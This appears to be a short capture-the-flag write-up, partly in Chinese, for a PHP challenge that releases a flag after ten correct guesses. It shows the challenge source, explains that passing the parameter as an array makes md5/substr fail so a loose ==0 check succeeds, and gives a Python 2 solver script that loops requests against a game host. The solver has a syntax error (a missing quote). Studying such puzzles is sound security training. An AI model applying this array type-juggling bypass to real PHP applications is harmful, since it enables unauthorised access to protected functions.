<?php
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
$_SESSION['nums'] = 0;
$_SESSION['time'] = time();
$_SESSION['whoami'] = 'ea';
}
if($_SESSION['time']+120<time()){
session_destroy();
}
$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];
if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
$_SESSION['nums']++;
$_SESSION['whoami'] = $str_rands;
echo $str_rands;
}
if($_SESSION['nums']>=10){
echo $flag;
}
show_source(__FILE__);
?>
重点就是这个判断语句if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0),可以发现这个whoami最开始是ea,然后当和value前两位相等时就变为另一个随机数,并输出,所以我们每次获取这个输出的随机数赋值给value就好,至于后半句,只要保证value为数组,substr就会失败,则等号成立。
import requests
url = "http://cdb71de019384d6dbd9acc73dd720d80e083270e01de4a31.game.ichunqiu.com/?value[]=ea"
s = requests.session()
r = s.get(url)
for i in range(15):
url = http://cdb71de019384d6dbd9acc73dd720d80e083270e01de4a31.game.ichunqiu.com/?value[]=" + r.content[0:2]
r = s.get(url)
print r.content